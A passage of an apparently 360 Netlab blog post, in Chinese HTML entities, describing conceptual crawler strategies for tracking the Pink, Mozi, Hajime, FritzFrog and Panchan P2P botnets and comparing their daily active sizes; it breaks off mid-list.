<p>&#x7531;&#x4E8E;P2P&#x7F51;&#x7EDC;&#x201C;&#x65E0;&#x4E2D;&#x5FC3;&#x201D;&#x7684;&#x7279;&#x70B9;&#xFF0C;&#x4F7F;&#x7528;&#x4F20;&#x7EDF;&#x7684;&#x624B;&#x6BB5;&#x6765;&#x8BC4;&#x4F30;&#x5176;&#x89C4;&#x6A21;&#x6709;&#x70B9;&#x56F0;&#x96BE;&#x3002;&#x4E3A;&#x4E86;&#x89E3;&#x51B3;&#x8FD9;&#x4E2A;&#x95EE;&#x9898;&#xFF0C;&#x5B89;&#x5168;&#x7814;&#x7A76;&#x4EBA;&#x5458;&#x53E6;&#x8F9F;&#x8E4A;&#x5F84;&#xFF0C;&#x53D1;&#x660E;&#x4E86;P2P&#x722C;&#x866B;&#x6280;&#x672F;&#xFF0C;&#x901A;&#x8FC7;&#x5B83;&#x6765;&#x8DDF;&#x8E2A;&#x67D0;&#x4E2A;P2P botnet&#xFF0C;&#x83B7;&#x53D6;&#x8282;&#x70B9;IP&#x4EE5;&#x53CA;&#x4E0B;&#x8F7D;&#x94FE;&#x63A5;&#x548C;&#x914D;&#x7F6E;&#x7B49;&#x4FE1;&#x606F;&#xFF0C;&#x7528;&#x4E8E;&#x89C4;&#x6A21;&#x8BC4;&#x4F30;&#x548C;&#x5B9A;&#x70B9;&#x6E05;&#x9664;&#x3002;</p>
<p>360 Netlab&#x81F4;&#x529B;&#x4E8E;&#x53CA;&#x65F6;&#x53D1;&#x73B0;&#x548C;&#x8DDF;&#x8E2A;&#x5927;&#x7F51;&#x4E0A;&#x6D3B;&#x8DC3;&#x7684;botnet&#xFF0C;&#x5BF9;P2P&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5F53;&#x7136;&#x4E0D;&#x4F1A;&#x653E;&#x8FC7;&#xFF0C;&#x6BD4;&#x5982;&#x6211;&#x4EEC;19&#x5E74;&#x9996;&#x5148;&#x516C;&#x5F00;&#x5206;&#x6790;&#x4E86;mozi&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x3002;&#x4E3A;&#x4E86;&#x66F4;&#x597D;&#x7684;&#x201C;&#x770B;&#x89C1;&#x201D;&#x5A01;&#x80C1;&#xFF0C;&#x6211;&#x4EEC;&#x57FA;&#x4E8E;&#x81EA;&#x8EAB;&#x7684;&#x79EF;&#x7D2F;&#x4EE5;&#x53CA;&#x4E1A;&#x5185;&#x5DF2;&#x6709;&#x7684;&#x5206;&#x6790;&#x7ED3;&#x679C;&#x6784;&#x5EFA;&#x4E86;&#x4E00;&#x4E2A;&#x9488;&#x5BF9;P2P Botnet&#x7684;&#x5DE5;&#x4E1A;&#x7EA7;&#x522B;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#xFF0C;&#x76EE;&#x6807;&#x662F;&#x8986;&#x76D6;&#x6240;&#x6709;&#x6D3B;&#x8DC3;&#x7684;P2P botnet&#xFF0C;&#x76EE;&#x524D;&#x57FA;&#x4E8E;&#x201C;&#x5386;&#x53F2;&#x89C4;&#x6A21;&#x8F83;&#x5927;&#x201D;&#x548C;&#x201C;&#x8FD1;&#x671F;&#x51FA;&#x73B0;&#x201D;&#x8FD9;&#x4E24;&#x4E2A;&#x7EF4;&#x5EA6;&#x4F18;&#x5148;&#x8DDF;&#x8E2A;&#x4E86;Pink&#x3001;Mozi&#x3001;Hajime&#x3001;FritzFrog&#x548C;Panchan&#x8FD9;5&#x4E2A;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#x7684;&#x5BB6;&#x65CF;&#xFF0C;&#x672C;&#x6587;&#x57FA;&#x4E8E;&#x8FD9;&#x4E2A;&#x7CFB;&#x7EDF;&#x4EA7;&#x751F;&#x7684;&#x8DDF;&#x8E2A;&#x6570;&#x636E;&#x7B80;&#x5355;&#x5206;&#x6790;&#x4E0B;&#x8FD9;5&#x4E2A;&#x5BB6;&#x65CF;&#x7684;&#x73B0;&#x72B6;&#x3002;</p>
<p><em><strong>PS:</strong></em> &#x9664;&#x672C;&#x6587;&#x63D0;&#x5230;&#x7684; 5 &#x4E2A;&#x5BB6;&#x65CF;&#x5916;&#xFF0C;&#x4E5F;&#x6B22;&#x8FCE;&#x8BFB;&#x8005;&#x628A;&#x5176;&#x4ED6;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x6D3B;&#x8DC3;&#x5BB6;&#x65CF;&#x7559;&#x5728;&#x4E0B;&#x65B9;&#x8BC4;&#x8BBA;&#x533A;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x914C;&#x60C5;&#x4F18;&#x5148;&#x5B89;&#x6392;&#x76EF;&#x68A2;&#x3002;</p>
<h1 id>&#x8DDF;&#x8E2A;&#x7B56;&#x7565;&#x6982;&#x8FF0;</h1>
<p>&#x672C;&#x5C0F;&#x8282;&#x4F1A;&#x7B80;&#x5355;&#x4ECB;&#x7ECD;&#x4E00;&#x4E0B;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x4E2D;&#x4F7F;&#x7528;&#x7684;&#x4E3B;&#x8981;&#x8DDF;&#x8E2A;&#x7B56;&#x7565;&#xFF0C;&#x4EE5;&#x65B9;&#x9762;&#x8BFB;&#x8005;&#x7406;&#x89E3;&#x6587;&#x4E2D;&#x6240;&#x7528;&#x6570;&#x636E;&#x7684;&#x4EA7;&#x751F;&#x8FC7;&#x7A0B;&#xFF0C;&#x589E;&#x5F3A;&#x6570;&#x636E;&#x7684;&#x53EF;&#x89E3;&#x91CA;&#x6027;&#x3002;</p>
<h2 id>&#x8DDF;&#x8E2A;&#x76EE;&#x6807;</h2>
<p>&#x8BE5;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x4EE5;&#x8BB0;&#x5F55;&#x8282;&#x70B9;IP&#x4E3A;&#x4E3B;&#x8981;&#x76EE;&#x6807;&#xFF0C;&#x901A;&#x8FC7;&#x6A21;&#x62DF;&#x901A;&#x8BAF;&#x534F;&#x8BAE;&#x7684;&#x65B9;&#x6CD5;&#x4F2A;&#x9020;&#x4E00;&#x4E2A;&#x8282;&#x70B9;&#xFF0C;&#x5E76;&#x4F7F;&#x5176;&#x52A0;&#x5165;&#x5BF9;&#x5E94;&#x7684;P2P&#x7F51;&#x7EDC;&#xFF0C;&#x53C2;&#x4E0E;&#x6570;&#x636E;&#x62A5;&#x6587;&#x4EA4;&#x6362;&#x3002;&#x6BCF;&#x6210;&#x529F;&#x5B8C;&#x6210;&#x4E00;&#x6B21;&#x62A5;&#x6587;&#x4EA4;&#x6362;&#xFF0C;&#x4FBF;&#x8BB0;&#x5F55;&#x4E0B;&#x5BF9;&#x65B9;&#x7684;IP&#xFF0C;&#x6700;&#x7EC8;&#x5B9E;&#x73B0;&#x5BF9;&#x76EE;&#x6807;P2P&#x7F51;&#x7EDC;&#x6240;&#x6709;&#x8282;&#x70B9;&#x7684;&#x8BB0;&#x5F55;&#x3002;</p>
<h2 id>&#x7B56;&#x7565;&#x5C55;&#x5F00;</h2>
<p>PS&#xFF1A;&#x7531;&#x4E8E;&#x5404;P2P&#x5BB6;&#x65CF;&#x7684;&#x534F;&#x8BAE;&#x8BBE;&#x8BA1;&#x5404;&#x4E0D;&#x76F8;&#x540C;&#xFF0C;&#x6240;&#x4EE5;&#x4EE5;&#x4E0B;&#x7B56;&#x7565;&#x5E76;&#x4E0D;&#x80FD;&#x5168;&#x90E8;&#x5229;&#x7528;&#x5728;&#x5404;&#x4E2A;&#x5BB6;&#x65CF;&#x4E0A;&#xFF0C;&#x53EA;&#x80FD;&#x6839;&#x636E;&#x5B9E;&#x9645;&#x60C5;&#x51B5;&#x9009;&#x62E9;&#x5176;&#x4E2D;&#x81F3;&#x5C11;&#x4E00;&#x4E2A;&#x7B56;&#x7565;&#x4F5C;&#x4E3A;&#x5BF9;&#x5E94;&#x5BB6;&#x65CF;&#x7684;&#x8DDF;&#x8E2A;&#x7B56;&#x7565;&#x3002;</p>
<p><strong>&#x4E3B;&#x52A8;&#x63A2;&#x6D4B;</strong>&#xFF1A;&#x8BE5;&#x7B56;&#x7565;&#x4ECE;&#x5DE5;&#x4F5C;&#x539F;&#x7406;&#x4E0A;&#x770B;&#xFF0C;&#x6709;&#x4E9B;&#x7C7B;&#x4F3C;&#x4E8E;&#x516C;&#x7F51;&#x626B;&#x63CF;&#x5668;&#x3002;&#x5B83;&#x9996;&#x5148;&#x5411;&#x76EE;&#x6807;&#x8282;&#x70B9;&#x6295;&#x5582;&#x63A2;&#x6D4B;&#x62A5;&#x6587;&#xFF0C;&#x7136;&#x540E;&#x5BF9;&#x6536;&#x5230;&#x7684;&#x56DE;&#x590D;&#x62A5;&#x6587;&#x8FDB;&#x884C;&#x89E3;&#x6790;&#xFF0C;&#x5F53;&#x8FD4;&#x56DE;&#x7684;&#x62A5;&#x6587;&#x683C;&#x5F0F;&#x7B26;&#x5408;&#x5BB6;&#x65CF;&#x7279;&#x5F81;&#x65F6;&#xFF0C;&#x5219;&#x5C06;&#x5BF9;&#x7AEF;&#x8BA4;&#x5B9A;&#x4E3A;&#x5BF9;&#x7B49;&#x8282;&#x70B9;&#x3002;&#x5728;&#x5B9E;&#x9645;&#x64CD;&#x4F5C;&#x4E2D;&#xFF0C;&#x6211;&#x4EEC;&#x4F1A;&#x5148;&#x5212;&#x5B9A;&#x4E00;&#x4E2A;&#x63A2;&#x6D4B;&#x8303;&#x56F4;&#xFF0C;&#x518D;&#x5BF9;&#x8FD9;&#x4E2A;&#x8303;&#x56F4;&#x5185;&#x7684;&#x8282;&#x70B9;&#x8FDB;&#x884C;&#x63A2;&#x6D4B;&#xFF08;&#x5176;&#x4E2D;&#x63A2;&#x6D4B;&#x8303;&#x56F4;&#x53EF;&#x80FD;&#x7531;&#x4E00;&#x4E2A;&#x53EF;&#x7591;&#x7F51;&#x6BB5;&#x7EC4;&#x6210;&#xFF0C;&#x4E5F;&#x53EF;&#x80FD;&#x662F;&#x4ECE;&#x5176;&#x4ED6;&#x7B56;&#x7565;&#x4E2D;&#x4EA7;&#x751F;&#x7684;&#x53EF;&#x7591;&#x8282;&#x70B9;&#x7EC4;&#x6210;&#xFF09;&#x3002;</p>
<p><strong>&#x6700;&#x8FD1;&#x901A;&#x8BAF;</strong>&#xFF1A;&#x5E38;&#x89C1; P2P &#x5BB6;&#x65CF;&#xFF0C;&#x4F1A;&#x5728;&#x6BCF;&#x4E2A;&#x8282;&#x70B9;&#x5185;&#x5B58;&#x4E2D;&#x7EF4;&#x62A4;&#x4E00;&#x4E2A;&#x8FD1;&#x671F;&#x901A;&#x8BAF;&#x8FC7;&#x7684;&#x201C;&#x6700;&#x8FD1;&#x901A;&#x8BAF;&#x5217;&#x8868;&#x201D;&#x3002;&#x5728;&#x90E8;&#x5206;&#x5BB6;&#x65CF;&#x4E2D;&#xFF0C;&#x5176;&#x4ED6;&#x8282;&#x70B9;&#x8FD8;&#x53EF;&#x901A;&#x8FC7;&#x7279;&#x5B9A;&#x6307;&#x4EE4;&#x83B7;&#x53D6;&#x5230;&#x8FD9;&#x4E2A;&#x5217;&#x8868;&#xFF0C;&#x4F5C;&#x4E3A;&#x81EA;&#x8EAB;&#x542F;&#x52A8;&#x65F6;&#x7684;&#x79CD;&#x5B50;&#x5217;&#x8868;&#xFF0C;&#x4ECE;&#x800C;&#x5FEB;&#x901F;&#x52A0;&#x5165; P2P &#x7F51;&#x7EDC;&#x3002;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x904D;&#x5386;&#x8FD9;&#x4E2A;&#x201C;&#x6700;&#x8FD1;&#x901A;&#x8BAF;&#x5217;&#x8868;&#x201D;&#xFF0C;&#x53D1;&#x73B0;&#x66F4;&#x591A;&#x7684;&#x5BF9;&#x7B49;&#x8282;&#x70B9;&#x3002;</p>
<p><strong>&#x8282;&#x70B9;&#x5FC3;&#x8DF3;</strong>&#xFF1A;&#x5F53;&#x4E00;&#x4E2A;&#x8282;&#x70B9;&#x7EF4;&#x62A4;&#x4E86;&#x201C;&#x6700;&#x8FD1;&#x901A;&#x8BAF;&#x5217;&#x8868;&#x201D;&#x540E;&#xFF0C;&#x8FD9;&#x4E2A;&#x8282;&#x70B9;&#x4E00;&#x822C;&#x90FD;&#x4F1A;&#x5B9A;&#x671F;&#x5411;&#x5217;&#x8868;&#x4E2D;&#x7684;&#x8282;&#x70B9;&#x53D1;&#x9001;&#x5FC3;&#x8DF3;&#x62A5;&#x6587;&#xFF0C;&#x58F0;&#x660E;&#x81EA;&#x8EAB;&#x5728;&#x7EBF;&#x60C5;&#x51B5;&#x3002;&#x57FA;&#x4E8E;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5C06;&#x201C;&#x4F2A;&#x9020;&#x8282;&#x70B9;&#x201D;&#x52A0;&#x5165;&#x5BF9;&#x65B9;&#x7684;&#x6D3B;&#x8DC3;&#x5217;&#x8868;&#x4E2D;&#xFF0C;&#x4EE5;&#x4FBF;&#x4E8E;&#x968F;&#x65F6;&#x83B7;&#x53D6;&#x76F8;&#x5E94;&#x8282;&#x70B9;&#x7684;&#x6D3B;&#x8DC3;&#x60C5;&#x51B5;&#x3002;&#x4E00;&#x4E9B;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x8FD8;&#x4F1A;&#x901A;&#x8FC7;&#x53D1;&#x9001;&#x5FC3;&#x8DF3;&#x62A5;&#x6587;&#x7684;&#x65B9;&#x5F0F;&#x4FDD;&#x8BC1;&#x81EA;&#x5DF1;&#x4E0D;&#x88AB;&#x8E22;&#x51FA;&#x5217;&#x8868;&#x3002;</p>
<p><strong>&#x5B88;&#x682A;&#x5F85;&#x5154;</strong>&#xFF1A;&#x4EE5;Hajime &#x548C;Mozi &#x4E3A;&#x4F8B;&#xFF0C;&#x8FD9;&#x4E24;&#x4E2A;&#x5BB6;&#x65CF;&#x4F1A;&#x5229;&#x7528;&#x201C;<a href="https://en.bitcoinwiki.org/wiki/Kademlia?ref=blog.netlab.360.com">&#x5206;&#x5E03;&#x5F0F;&#x54C8;&#x5E0C;&#x8868;&#x6280;&#x672F;</a>&#x201D;&#x6765;&#x5B9E;&#x73B0;&#x5176;P2P&#x7F51;&#x7EDC;&#x7ED3;&#x6784;&#x3002;&#x8BE5;&#x6280;&#x672F;&#x5728;&#x8BBE;&#x8BA1;&#x65F6;&#x4E3A;&#x4E86;&#x52A0;&#x901F;&#x6570;&#x636E;&#x67E5;&#x627E;&#x901F;&#x5EA6;&#xFF0C;&#x52A0;&#x5165;&#x4E86;&#x4E00;&#x4E2A;&#x4FE1;&#x606F;&#x5230;&#x8282;&#x70B9;&#x8DDD;&#x79BB;&#x7684;&#x89C4;&#x5219;&#xFF0C;&#x5E76;&#x5C06;&#x5F85;&#x5B58;&#x50A8;&#x4FE1;&#x606F;&#x4F18;&#x5148;&#x4FDD;&#x5B58;&#x5728;&#x8DDD;&#x79BB;&#x8F83;&#x8FD1;&#x7684;&#x90A3;&#x4E9B;&#x8282;&#x70B9;&#x4E0A;&#x3002;&#x57FA;&#x4E8E;&#x6B64;&#x89C4;&#x5219;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x83B7;&#x77E5;&#x5F85;&#x83B7;&#x53D6;&#x4FE1;&#x606F;&#x540E;&#xFF0C;&#x53EF;&#x4EE5;&#x4F2A;&#x9020;&#x51FA;&#x4E00;&#x4E2A;&#x8DDD;&#x79BB;&#x8BE5;&#x4FE1;&#x606F;&#x6700;&#x8FD1;&#x7684;&#x8282;&#x70B9;&#x7B49;&#x5F85;&#x5176;&#x4ED6;&#x8282;&#x70B9;&#x7684;&#x5230;&#x6765;&#xFF0C;&#x5F53;&#x5176;&#x4ED6;&#x8282;&#x70B9;&#x5C1D;&#x8BD5;&#x4ECE;&#x4F2A;&#x9020;&#x8282;&#x70B9;&#x83B7;&#x53D6;&#x5BF9;&#x5E94;&#x5BB6;&#x65CF;&#x7684;&#x4FE1;&#x606F;&#x65F6;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x5C06;&#x5BF9;&#x65B9;IP&#x4F5C;&#x4E3A;&#x8DDF;&#x8E2A;&#x7ED3;&#x679C;&#x8BB0;&#x5F55;&#x4E0B;&#x6765;&#x3002;</p>
<h1 id>&#x6570;&#x636E;&#x542B;&#x4E49;</h1>
<h2 id>&#x8DDF;&#x8E2A;&#x5BB6;&#x65CF;&#x9009;&#x62E9;&#x4F9D;&#x636E;</h2>
<p>&#x8981;&#x60F3;&#x51C6;&#x786E;&#x4F30;&#x8BA1; P2PBotnet &#x7684;&#x6574;&#x4F53;&#x60C5;&#x51B5;&#xFF0C;&#x9009;&#x62E9;&#x54EA;&#x4E9B;&#x5BB6;&#x65CF;&#x5F88;&#x91CD;&#x8981;&#xFF0C;&#x7406;&#x60F3;&#x72B6;&#x6001;&#x4E0B;&#x80AF;&#x5B9A;&#x662F;&#x628A;&#x6240;&#x6709;&#x5BB6;&#x65CF;&#x90FD;&#x653E;&#x5230;&#x4E00;&#x8D77;&#x8FDB;&#x884C;&#x6BD4;&#x8F83;&#xFF0C;&#x624D;&#x5BA2;&#x89C2;&#x516C;&#x6B63;&#xFF0C;&#x4F46;&#x6BCF;&#x589E;&#x52A0;&#x4E00;&#x4E2A;&#x5BB6;&#x65CF;&#x90FD;&#x4F1A;&#x63D0;&#x9AD8;&#x7CFB;&#x7EDF;&#x6574;&#x4F53;&#x7684;&#x5B8C;&#x6210;&#x96BE;&#x5EA6;&#xFF0C;&#x8FD9;&#x662F;&#x65E0;&#x6CD5;&#x4E00;&#x8E74;&#x800C;&#x5C31;&#x7684;&#x3002;&#x6240;&#x4EE5;&#xFF0C;&#x6211;&#x4EEC;&#x8003;&#x8651;&#x4ECE;&#x4EE5;&#x4E0B;&#x4E24;&#x4E2A;&#x7EF4;&#x5EA6;&#x6765;&#x7B5B;&#x9009;&#x5408;&#x9002;&#x7684;&#x5BB6;&#x65CF;&#x8FDB;&#x884C;&#x8DDF;&#x8E2A;&#xFF0C;&#x4EE5;&#x4FDD;&#x8BC1;&#x6700;&#x7EC8;&#x7ED3;&#x679C;&#x7684;&#x76F8;&#x5BF9;&#x5BA2;&#x89C2;&#x3002;</p>
<p><strong>&#x57FA;&#x4E8E;&#x89C4;&#x6A21;</strong>: &#x5728;&#x9009;&#x62E9;&#x5BB6;&#x65CF;&#x65F6;&#xFF0C;&#x6700;&#x4F18;&#x5148;&#x8003;&#x8651;&#x7684;&#x6307;&#x6807;&#x5C31;&#x662F;&#x8981;&#x89C4;&#x6A21;&#x591F;&#x5927;&#xFF0C;&#x6216;&#x8005;&#x8BF4;&#x66FE;&#x7ECF;&#x5386;&#x53F2;&#x4E0A;&#x7684;&#x89C4;&#x6A21;&#x591F;&#x5927;&#xFF0C;&#x8FD9;&#x6837;&#x624D;&#x80FD;&#x4FDD;&#x8BC1;&#x6211;&#x4EEC;&#x7684;&#x8BC4;&#x4F30;&#x7ED3;&#x679C;&#x6709;&#x8BF4;&#x670D;&#x529B;&#xFF0C;&#x6240;&#x4EE5;&#x201C;Hajime&#x201D;/&#x201C;Mozi&#x201D;/&#x201C;pink&#x201D; &#x6BEB;&#x65E0;&#x7591;&#x95EE;&#x7684;&#x4E2D;&#x9009;&#x4E86;&#x3002;</p>
<p><strong>&#x8FD1;&#x671F;&#x62AB;&#x9732;</strong>&#xFF1A; &#x5176;&#x6B21;&#x7684;&#x9009;&#x62E9;&#x5C31;&#x662F;&#x65B0;&#x51FA;&#x73B0;&#xFF0C;&#x5E76;&#x5DF2;&#x7ECF;&#x6D3B;&#x8DC3;&#x4E00;&#x6BB5;&#x65F6;&#x95F4;&#xFF0C;&#x4EE5;&#x907F;&#x514D;&#x540E;&#x6765;&#x8005;&#x5C45;&#x4E0A;&#x7684;&#x60C5;&#x51B5;&#x53D1;&#x751F;&#xFF0C;&#x57FA;&#x4E8E;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x9009;&#x62E9;&#x4E86;&#x672C;&#x5E74;&#x65B0;&#x62AB;&#x9732;&#x7684; &#x201C;panchan&#x201D; &#x548C; &#x201C;frizefrog&#x201D;&#x4F5C;&#x4E3A;&#x8DDF;&#x8E2A;&#x76EE;&#x6807;&#x3002;</p>
<h2 id="ip">&#x53D7;&#x63A7;&#x7AEF;IP&#x7684;&#x542B;&#x4E49;</h2>
<p>&#x89C6;&#x5BBF;&#x4E3B;&#x8BBE;&#x5907;&#x7C7B;&#x578B;&#x800C;&#x5B9A;&#xFF0C;&#x53D7;&#x63A7;&#x7AEF;IP&#x7684;&#x542B;&#x4E49;&#x4F1A;&#x5B58;&#x5728;&#x4E00;&#x4E9B;&#x6311;&#x6218;&#xFF0C;&#x5E76;&#x4E0D;&#x80FD;&#x76F4;&#x63A5;&#x53CD;&#x5E94;&#x53D7;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x7684;&#x771F;&#x5B9E;&#x6570;&#x91CF;&#x3002;</p>
<p><em>&#x53D7;&#x63A7;&#x5BBF;&#x4E3B;&#x4E3A;&#x5E38;&#x5E74;&#x5728;&#x7EBF;&#x670D;&#x52A1;&#x5668;</em>&#xFF1A;&#x8FD9;&#x7C7B;&#x670D;&#x52A1;&#x5668;&#x4E3A;&#x4E86;&#x80FD;&#x591F;&#x7A33;&#x5B9A;&#x7684;&#x63D0;&#x4F9B;&#x670D;&#x52A1;&#xFF0C;&#x5176;&#x516C;&#x7F51;IP&#x4E00;&#x822C;&#x4E0D;&#x4F1A;&#x53D8;&#x5316;&#x3002;&#x6B64;&#x65F6;&#x53D7;&#x63A7;&#x7AEF;&#x7684;&#x516C;&#x7F51;IP&#x548C;&#x8BBE;&#x5907;&#x6570;&#x91CF;&#x95F4;&#x6709;&#x7A33;&#x5B9A;&#x7684;&#x5BF9;&#x5E94;&#x5173;&#x7CFB;&#x3002;</p>
<p><em>&#x53D7;&#x63A7;&#x7AEF;&#x5BBF;&#x4E3B;&#x4E3A;IoT&#x8BBE;&#x5907;</em>&#xFF1A;&#x8FD9;&#x7C7B;&#x8BBE;&#x5907;&#x4E00;&#x822C;&#x51FA;&#x73B0;&#x5728;&#x5C45;&#x6C11;&#x7F51;&#x6BB5;&#x5185;&#x3002;&#x5C45;&#x6C11;&#x4E0A;&#x7F51;&#x65F6;&#xFF0C;&#x4E00;&#x65B9;&#x9762;&#x4F1A;&#x51FA;&#x73B0;&#x591A;&#x6237;&#x5C45;&#x6C11;&#x5171;&#x7528;&#x540C;&#x4E00;&#x516C;&#x7F51;&#x51FA;&#x53E3;&#x7684;&#x60C5;&#x51B5;&#xFF08;NAT&#x7F51;&#x7EDC;&#xFF09;&#xFF0C;&#x53E6;&#x4E00;&#x65B9;&#x9762;&#x8FD8;&#x4F1A;&#x6709;&#x62E8;&#x53F7;&#x4E0A;&#x7F51;&#x6309;&#x65F6;&#x8BA1;&#x8D39;&#x7684;&#x60C5;&#x51B5;&#xFF0C;&#x4F7F;&#x5C45;&#x6C11;&#x7684;IP&#x5730;&#x5740;&#x9891;&#x7E41;&#x53D8;&#x52A8;&#x3002;&#x8FD9;&#x4F1A;&#x5BFC;&#x81F4;&#x516C;&#x7F51;IP&#x4E0E;&#x8BBE;&#x5907;&#x95F4;&#x7684;&#x6620;&#x5C04;&#x5173;&#x7CFB;&#x51FA;&#x73B0;&#x8F83;&#x5927;&#x7684;&#x4E0D;&#x786E;&#x5B9A;&#x6027;&#x3002;&#x591A;&#x8BBE;&#x5907;&#x5171;&#x7528;&#x4E00;&#x4E2A;&#x516C;&#x7F51;IP(NAT&#x573A;&#x666F;)&#xFF0C;&#x5728;&#x4E00;&#x4E2A;&#x65F6;&#x95F4;&#x7A97;&#x53E3;&#x5185;&#x8BBE;&#x5907;&#x591A;&#x6B21;&#x5207;&#x6362;&#x4E0D;&#x540C;&#x7684;IP&#xFF08;&#x62E8;&#x53F7;&#x4E0A;&#x7F51;&#x573A;&#x666F;&#xFF09;&#x3002;</p>
<h1 id>&#x5404;&#x5BB6;&#x65CF;&#x65E5;&#x6D3B;&#x8D8B;&#x4E8E;&#x7A33;&#x5B9A;</h1>
<p>&#x4F5C;&#x4E3A;&#x5BF9;&#x6BD4;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x628A; 8&#x6708;&#x4EE5;&#x6765;&#x6BCF;&#x4E2A;&#x5468;&#x4E00;&#x7684;&#x65E5;&#x6D3B;&#x6570;&#x4F5C;&#x4E3A;&#x62BD;&#x6837;&#xFF0C;&#x6765;&#x7ED8;&#x5236;&#x4E2D;&#x957F;&#x671F;&#x8DDF;&#x8E2A;&#x56FE;&#xFF0C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/P2P_080910_HMP.png" alt="P2P_080910_HMP" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/P2P_080910_Fri_Panchan.png" alt="P2P_080910_Fri_Panchan" loading="lazy"></p>
<p>&#x4ECE;&#x91CF;&#x7EA7;&#x4E0A;&#xFF0C;&#x6211;&#x4EEC;&#x80FD;&#x9996;&#x5148;&#x5F97;&#x51FA;&#xFF0C;5&#x4E2A;&#x5BB6;&#x65CF;&#x5728;&#x65E5;&#x6D3B;&#x89C4;&#x6A21;&#x4E0A;&#x7684;&#x5927;&#x5C0F;&#x5173;&#x7CFB;&#xFF1A;</p>
<p>Pink &gt; Hajime &gt; Mozi &gt;&gt; FritzFrog &lt;&gt; Panchan</p>
<p>&#x5176;&#x6B21;&#xFF0C;&#x8FD8;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#xFF0C;&#x5728;&#x4E09;&#x4E2A;&#x6708;&#x4EE5;&#x6765;&#xFF0C;&#x5404;&#x5BB6;&#x65CF;&#x7684;&#x65E5;&#x6D3B;&#x6570;&#x636E;&#x53D8;&#x5316;&#x5E76;&#x4E0D;&#x5927;&#xFF08;&#x5173;&#x4E8E; Pink &#x5728;8&#x6708;&#x4EFD;&#x7684;&#x6CE2;&#x52A8;&#x60C5;&#x51B5;&#x89C1;&#x4E0B;&#x6587;&#x7684;&#x8BA8;&#x8BBA;&#xFF0C;&#x8FD9;&#x91CC;&#x6682;&#x65F6;&#x5FFD;&#x7565;&#xFF09;&#x3002;&#x9762;&#x5BF9;&#x8FD9;&#x6837;&#x7684;&#x73B0;&#x8C61;&#xFF0C;&#x6211;&#x4EEC;&#x5927;&#x81F4;&#x8BA8;&#x8BBA;&#x51FA;&#x4E86;&#x4EE5;&#x4E0B;&#x51E0;&#x70B9;&#x539F;&#x56E0;&#xFF0C;&#x4F9B;&#x5927;&#x5BB6;&#x53C2;&#x8003;&#xFF1A;</p>
<ol>
<li>P2P &#x7C7B;&#x578B;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x5929;&#x7136;&#x96BE;&#x4EE5;&#x6E05;&#x7406;&#x3002;&#x96C6;&#x4E2D;&#x5F0F;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x53EA;&#x8981;&#x6253;&#x6389;&#x4E3B;&#x63A7;&#x7AEF;&#xFF0C;&#x53D7;&#x63A7;&#x7AEF;&#x5F88;&#x5BB9;&#x6613;&#x5931;&#x53BB;&#x6D3B;&#x6027;&#x9010;&#x6B65;&#x88AB;&#x5176;&#x4ED6;&#x7F51;&#x7EDC;&#x8695;&#x98DF;&#x3002;&#x800C;P2P&#x7C7B;&#x578B;&#x5219;&#x4E0D;&#x5B58;&#x5728;&#x4E25;&#x683C;&#x7684;&#x4E3B;&#x63A7;&#x7AEF;&#xFF0C;&#x6BCF;&#x4E2A;&#x8282;&#x70B9;&#x90FD;&#x662F;&#x81EA;&#x53D1;&#x7684;&#x6269;&#x5C55;&#x548C;&#x4F20;&#x64AD;&#xFF0C;&#x60F3;&#x8981;&#x5B8C;&#x5168;&#x5728;&#x7F51;&#x7EDC;&#x4E0A;&#x6E05;&#x7406;&#x5E72;&#x51C0;&#x5F88;&#x96BE;&#x3002;</li>
<li>IoT&#x7C7B;&#x578B;&#x7684;&#x8BBE;&#x5907;&#x4E0D;&#x4F1A;&#x9891;&#x7E41;&#x66F4;&#x6362;&#x548C;&#x5347;&#x7EA7;&#x3002;&#x8FD9;&#x4E9B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x5BBF;&#x4E3B;&#x5927;&#x90E8;&#x5206;&#x4EE5; IoT &#x8BBE;&#x5907;&#x4E3A;&#x4E3B;&#xFF0C;&#x4E0D;&#x66F4;&#x6362;&#x610F;&#x5473;&#x7740;&#x957F;&#x671F;&#x5904;&#x5728;&#x201C;&#x67D3;&#x6BD2;&#x201D;&#x7684;&#x72B6;&#x6001;&#xFF0C;&#x8BBE;&#x5907;&#x7CFB;&#x7EDF;&#x4E0D;&#x5347;&#x7EA7;&#xFF0C;&#x610F;&#x5473;&#x7740;&#x957F;&#x671F;&#x5904;&#x5728;&#x201C;&#x6613;&#x611F;&#x67D3;&#x201D;&#x7684;&#x72B6;&#x6001;&#x3002;&#x7EFC;&#x5408;&#x4E0B;&#x6765;&#xFF0C;&#x8FD9;&#x4E9B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x8282;&#x70B9;&#x6570;&#x91CF;&#x5C31;&#x4F1A;&#x5904;&#x5728;&#x4E00;&#x4E2A;&#x76F8;&#x5BF9;&#x7A33;&#x5B9A;&#x7684;&#x72B6;&#x6001;&#x4E0B;&#x3002;</li>
